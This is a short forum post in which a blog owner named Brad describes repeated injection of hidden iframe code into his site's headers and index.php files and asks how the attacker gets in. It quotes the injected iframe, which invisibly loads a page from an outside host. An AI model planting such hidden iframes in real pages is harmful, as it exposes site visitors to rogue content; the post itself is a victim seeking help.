Hi,
A few weeks ago, I found that someone had injected hidden iframe code into my headers. I immediately backed up the blog and restored it from backup. Then I changed all my passwords.
This morning, it appears the same person ran the same injection routine that changed all my index.php files to point to their rogue site (<iframe src="http://globalnameshop.cn:8080/index.php" width=126 height=148 style="visibility: hidden"></iframe>)
My site is www.persistenceunlimited.com
How are they doing this? I've run the hardening utilities and checked all settings, but can't find how they are doing this.
Thanks,
Brad